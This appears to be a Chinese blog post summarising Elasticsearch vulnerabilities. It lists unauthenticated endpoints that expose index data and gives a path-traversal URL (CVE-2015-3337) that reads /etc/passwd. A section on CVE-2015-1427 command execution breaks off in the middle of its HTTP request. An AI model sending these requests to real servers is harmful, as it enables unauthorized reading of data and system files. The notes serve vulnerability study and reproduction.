Elasticsearch 漏洞收集总结

一:未授权访问获取敏感信息

/_cat/indices
/_plugin/sql/
/_nodes
/_search
/_search?preety
/_status

在这里插入图片描述

二:目录遍历漏洞(cve-2015-3337)

安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响
/_cat/plugins:查看所有已安装的插件
一般复现以head插件为例,若查看存在head插件,burp
访问

http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd

参考:https://blog.youkuaiyun.com/qq_36374896/article/details/84145527

三: CVE-2015-1427任意命令执行

JAVA反射执行代码

插入数据:

POST /website/blog/ HTTP/1.1
Host: ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Tri
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值